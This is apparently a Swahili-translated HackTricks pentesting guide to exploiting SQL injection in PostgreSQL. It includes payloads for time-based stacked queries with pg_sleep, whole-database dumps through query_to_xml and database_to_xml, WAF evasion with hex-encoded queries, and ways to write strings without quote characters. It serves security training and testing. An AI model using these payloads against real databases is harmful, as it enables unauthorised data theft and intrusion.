hacktricks/pentesting-web/sql-injection/postgresql-injection/README.md

# Kuingiza kwa PostgreSQL

<details>

<summary><strong>Jifunze kuhusu kuingiza AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuingiza kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Ikiwa una nia ya **kazi ya kuingiza** na kuingiza kwa yasiyoweza kuingizwa - **tunakupa kazi!** (_inahitajika uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha_).

{% embed url="https://www.stmcyber.com/careers" %}

***

**Ukurasa huu unalenga kueleza mbinu tofauti ambazo zinaweza kukusaidia kuchexploitisha SQLinjection iliyopatikana kwenye database ya postgresql na kuzipatia mbinu unazoweza kupata kwenye** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)

## Mwingiliano wa Mtandao - Ukarabati wa Mamlaka, Skana ya Bandari, Ufunuo wa Majibu ya Changamoto ya NTLM & Uchukuzi

Moduli ya **PostgreSQL `dblink`** inatoa uwezo wa kuunganisha kwenye mifano mingine ya PostgreSQL na kutekeleza uhusiano wa TCP. Vipengele hivi, vikiungwa mkono na utendaji wa `COPY FROM`, huwezesha hatua kama vile ukarabati wa mamlaka, skanning ya bandari, na kukamata majibu ya changamoto ya NTLM. Kwa njia za kina za kutekeleza mashambulizi haya angalia jinsi ya [kutekeleza mashambulizi haya](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md).

### **Mfano wa Uchukuzi ukitumia dblink na vitu vikubwa**

Unaweza [**kusoma mfano huu**](dblink-lo\_import-data-exfiltration.md) kuona mfano wa CTF wa **jinsi ya kupakia data ndani ya vitu vikubwa na kisha kuchukua yaliyomo ya vitu vikubwa ndani ya jina la mtumiaji** la kazi `dblink_connect`.

## Mashambulizi ya PostgreSQL: Kusoma/kuandika, RCE, ukarabati wa mamlaka

Angalia jinsi ya kudhuru mwenyeji na kuongeza mamlaka kutoka PostgreSQL katika:

{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %}
[pentesting-postgresql.md](../../../network-services-pentesting/pentesting-postgresql.md)
{% endcontent-ref %}

## Kupitisha WAF

### Vipengele vya String vya PostgreSQL

Kubadilisha strings inaweza kukusaidia **kupitisha WAFs au vizuizi vingine**.\
[**Kwenye ukurasa huu** ](https://www.postgresqltutorial.com/postgresql-string-functions/)**unaweza kupata baadhi ya Vipengele vya Strings vinavyoweza kutumika.**

### Mipangilio Iliyopangwa

Kumbuka kwamba postgresql inasaidia mipangilio iliyopangwa, lakini programu kadhaa zitatoa kosa ikiwa majibu 2 yatarudi wakati inatarajia 1 tu. Lakini, bado unaweza kutumia vibaya mipangilio iliyopangwa kupitia Kuingiza ya Wakati:
```
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
```
### Mbinu za XML

**query\_to\_xml**

Hii kazi itarudisha data yote katika muundo wa XML katika faili moja tu. Ni bora ikiwa unataka kudump data nyingi katika safu moja tu:
```sql
SELECT query_to_xml('select * from pg_user',true,true,'');
```
**database\_to\_xml**

Hii function itadump database nzima kwa muundo wa XML katika safu 1 tu (kuwa makini ikiwa database ni kubwa sana kwani unaweza kuisababishia DoS au hata mteja wako mwenyewe):
```sql
SELECT database_to_xml(true,true,'');
```
### Strings in Hex

Ikiwa unaweza kuendesha **mambo** kwa kuwapitisha **ndani ya string** (kwa mfano kutumia kazi ya **`query_to_xml`**). **Unaweza kutumia convert\_from kuwapitisha string kama hex na kuepuka mifumo ya kuchuja njia hii:**
```sql
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
```
{% endcode %}

### Alama za kutumia

Ikiwa huwezi kutumia alama za nukta kwa payload yako unaweza kuzipuuza kwa kutumia `CHR` kwa ajili ya misingi ya vifungu (upatanishaji wa herufi pekee unafanya kazi kwa misingi ya msingi kama vile SELECT, INSERT, DELETE, nk. Haifanyi kazi kwa taarifa zote za SQL_)
```
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
```
Au na `$`. Hizi mizunguko ya kuuliza huleta matokeo sawa:
```
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
```
<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

Ikiwa una nia ya **kazi ya udukuzi** na kudukua yasiyoweza kudukuliwa - **tunakupa kazi!** (_ujuzi wa Kipolishi wa kuandika na kusema unahitajika_).

{% embed url="https://www.stmcyber.com/careers" %}

<details>

<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>